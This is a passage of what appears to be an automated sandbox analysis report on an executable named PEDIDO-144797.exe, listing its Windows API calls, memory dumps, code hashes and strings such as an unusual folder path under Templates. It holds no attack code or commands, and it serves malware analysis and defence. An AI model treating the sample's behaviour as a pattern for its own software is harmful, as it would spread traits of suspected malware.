• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: cb92cf7ccb1965bdce3badc7d49dd673c55c158fa478f1f9cab94f81649d65d9
• Instruction ID: adf76bd272608bb1b99769d9a9b05885636640fbfa2c3f91bbd7a8ebdab0685d
• Opcode Fuzzy Hash: cb92cf7ccb1965bdce3badc7d49dd673c55c158fa478f1f9cab94f81649d65d9
• Instruction Fuzzy Hash: 45D0A773F141008BD720EBB8BE8945E73F8E7803193208837E102F11D1E578C8928A2D
APIs
• GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
Memory Dump Source
• Source File: 00000000.00000002.89705298637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.89705275487.0000000010000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.89705326435.0000000010003000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.89705350965.0000000010005000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_PEDIDO-144797.jbxd
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
• Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
• Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
• Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
• Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
APIs
• GetDlgItem.USER32(?,00000403), ref: 004055B1
• GetDlgItem.USER32(?,000003EE), ref: 004055C0
• GetClientRect.USER32(?,?), ref: 004055FD
• GetSystemMetrics.USER32(00000002), ref: 00405604
• SendMessageW.USER32(?,00001061,00000000,?), ref: 00405625
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405636
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405649
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405657
• SendMessageW.USER32(?,00001024,00000000,?), ref: 0040566A
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040568C
• ShowWindow.USER32(?,00000008), ref: 004056A0
• GetDlgItem.USER32(?,000003EC), ref: 004056C1
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004056D1
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004056EA
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004056F6
• GetDlgItem.USER32(?,000003F8), ref: 004055CF
  • Part of subcall function 0040437A: SendMessageW.USER32(00000028,?,00000001,004041A5), ref: 00404388
• GetDlgItem.USER32(?,000003EC), ref: 00405713
• CreateThread.KERNEL32(00000000,00000000,Function_000054E7,00000000), ref: 00405721
• CloseHandle.KERNEL32(00000000), ref: 00405728
• ShowWindow.USER32(00000000), ref: 0040574C
• ShowWindow.USER32(?,00000008), ref: 00405751
• ShowWindow.USER32(00000008), ref: 0040579B
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057CF
• CreatePopupMenu.USER32 ref: 004057E0
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004057F4
• GetWindowRect.USER32(?,?), ref: 00405814
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040582D
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405865
• OpenClipboard.USER32(00000000), ref: 00405875
• EmptyClipboard.USER32 ref: 0040587B
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405887
• GlobalLock.KERNEL32(00000000), ref: 00405891
• SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A5
• GlobalUnlock.KERNEL32(00000000), ref: 004058C5
• SetClipboardData.USER32(0000000D,00000000), ref: 004058D0
• CloseClipboard.USER32 ref: 004058D6
Strings
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID: (7B${
• API String ID: 590372296-525222780
• Opcode ID: f086514403ad079958e05c79f9398a2ee239ec86c73215fd307c521ee98444fa
• Instruction ID: f8c5fe522ebc9739dae7df13929d3a15495bf3740f19f89270c8c50aa4207807
• Opcode Fuzzy Hash: f086514403ad079958e05c79f9398a2ee239ec86c73215fd307c521ee98444fa
• Instruction Fuzzy Hash: AFB15870900608FFDB11AFA0DD85AAE7B79FB44354F00847AFA45B61A0CB754E51DF68
                                                                                                                                          APIs
                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404DA8
                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404DB3
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DFD
                                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404E10
                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,00405388), ref: 00404E29
                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E3D
                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E4F
                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404E65
                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E71
                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E83
                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404E86
                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EB1
                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EBD
                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F53
                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404F7E
                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F92
                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404FC1
                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404FCF
                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404FE0
                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 004050DD
                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405142
                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405157
                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040517B
                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040519B
                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004051B0
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 004051C0
                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405239
                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004052E2
                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004052F1
                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00405311
                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 0040535F
                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 0040536A
                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405371
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                          • String ID: $M$N
                                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                                          • Opcode ID: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
                                                                                                                                          • Instruction ID: 31ae2990ecb9e768136dc40aca02b7f59ce629e1f3cadc681249b7cbd6abf0de
                                                                                                                                          • Opcode Fuzzy Hash: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
                                                                                                                                          • Instruction Fuzzy Hash: 09027DB0A00609EFDB209F54DC45AAE7BB5FB44354F10817AE610BA2E0C7798E52CF58
                                                                                                                                          APIs
                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404863
                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 0040488D
                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040493E
                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404949
                                                                                                                                          • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 0040497B
                                                                                                                                          • lstrcatW.KERNEL32(?,Call), ref: 00404987
                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404999
                                                                                                                                            • Part of subcall function 004059F6: GetDlgItemTextW.USER32(?,?,00000400,004049D0), ref: 00405A09
                                                                                                                                            • Part of subcall function 00406644: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PEDIDO-144797.exe",00403464,C:\Users\user\AppData\Local\Temp\,77763420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
                                                                                                                                            • Part of subcall function 00406644: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
                                                                                                                                            • Part of subcall function 00406644: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PEDIDO-144797.exe",00403464,C:\Users\user\AppData\Local\Temp\,77763420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
                                                                                                                                            • Part of subcall function 00406644: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PEDIDO-144797.exe",00403464,C:\Users\user\AppData\Local\Temp\,77763420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE
                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A5C
                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A77
                                                                                                                                            • Part of subcall function 00404BD0: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
                                                                                                                                            • Part of subcall function 00404BD0: wsprintfW.USER32 ref: 00404C7A
                                                                                                                                            • Part of subcall function 00404BD0: SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                          • String ID: (7B$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$Call
                                                                                                                                          • API String ID: 2624150263-212780734
                                                                                                                                          • Opcode ID: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
                                                                                                                                          • Instruction ID: 8d8d1438250e4d518a9e2371570913b63a9457987511b3c3302aefac7d34506d
                                                                                                                                          • Opcode Fuzzy Hash: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
                                                                                                                                          • Instruction Fuzzy Hash: B3A184F1A00209ABDB119FA5CD45AAF77B8EF84314F14843BFA01B62D1D77C99418B6D
                                                                                                                                          APIs
                                                                                                                                          • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                                                                                                          Strings
                                                                                                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\mississippi, xrefs: 004021BD
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateInstance
                                                                                                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\mississippi
                                                                                                                                          • API String ID: 542301482-2076318099
                                                                                                                                          • Opcode ID: d21109b947604d2aeedf4ad2c9da0992de00d0e594a19d7853b024dfbf8c0e49
                                                                                                                                          • Instruction ID: fcf7de762e0310186ccf97c85ab7d5ba58e988de4da68cff16f28a22b081737a
                                                                                                                                          • Opcode Fuzzy Hash: d21109b947604d2aeedf4ad2c9da0992de00d0e594a19d7853b024dfbf8c0e49
                                                                                                                                          • Instruction Fuzzy Hash: EE414A75A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                                                                                                          APIs
                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: d93f1720afb55d10142a5d85e05fc16c00c53f1b0b53f4af4ae9949186ca55c3
• Instruction ID: 1506565ccd7b679c7f55cec76d0c208d7a3b57e4c41f2eb52868ec6bdbdc004a
• Opcode Fuzzy Hash: d93f1720afb55d10142a5d85e05fc16c00c53f1b0b53f4af4ae9949186ca55c3
• Instruction Fuzzy Hash: 38F05E71A04104ABD710EBA4DA499ADB368EF00314F2005BBF541F21D1D7B84D919B2A
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA8
• ShowWindow.USER32(?), ref: 00403EC5
• DestroyWindow.USER32 ref: 00403ED9
• SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF5
• GetDlgItem.USER32(?,?), ref: 00403F16
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F2A
• IsWindowEnabled.USER32(00000000), ref: 00403F31
• GetDlgItem.USER32(?,00000001), ref: 00403FDF
• GetDlgItem.USER32(?,00000002), ref: 00403FE9
• SetClassLongW.USER32(?,000000F2,?), ref: 00404003
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404054
• GetDlgItem.USER32(?,00000003), ref: 004040FA
• ShowWindow.USER32(00000000,?), ref: 0040411B
• EnableWindow.USER32(?,?), ref: 0040412D
• EnableWindow.USER32(?,?), ref: 00404148
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040415E
• EnableMenuItem.USER32(00000000), ref: 00404165
• SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040417D
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404190
• lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041BA
• SetWindowTextW.USER32(?,00423728), ref: 004041CE
• ShowWindow.USER32(?,0000000A), ref: 00404302
Strings
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
• String ID: (7B
• API String ID: 184305955-3251261122
• Opcode ID: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
• Instruction ID: 85a8b1cb5875a9f0130709c86f20b78f231723f1bf47f2e7597622744019d293
• Opcode Fuzzy Hash: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
• Instruction Fuzzy Hash: 88C1A1B1640200FFDB216F61EE85D2B3BA8EB95305F40053EFA41B21F0CB7959529B6E
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404580
• GetDlgItem.USER32(?,000003E8), ref: 00404594
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045B1
• GetSysColor.USER32(?), ref: 004045C2
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045D0
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045DE
• lstrlenW.KERNEL32(?), ref: 004045E3
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045F0
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404605
• GetDlgItem.USER32(?,0000040A), ref: 0040465E
• SendMessageW.USER32(00000000), ref: 00404665
• GetDlgItem.USER32(?,000003E8), ref: 00404690
• SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046D3
• LoadCursorW.USER32(00000000,00007F02), ref: 004046E1
• SetCursor.USER32(00000000), ref: 004046E4
• LoadCursorW.USER32(00000000,00007F00), ref: 004046FD
• SetCursor.USER32(00000000), ref: 00404700
• SendMessageW.USER32(00000111,00000001,00000000), ref: 0040472F
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00404741
Strings
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
• String ID: Call$N$YD@
• API String ID: 3103080414-3276248472
• Opcode ID: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
• Instruction ID: b733f22c3e4a4344af423a89e947fb2470a434e6d87e1c723dfed1fecd84da00
• Opcode Fuzzy Hash: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
• Instruction Fuzzy Hash: E16172B1A00209BFDB109F60DD85AAA7B69FB85354F00813AFB05BB1E0D7789951CF58
APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectW.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
• Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
• Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
• Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
APIs
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406197,?,?), ref: 00406037
• GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406040
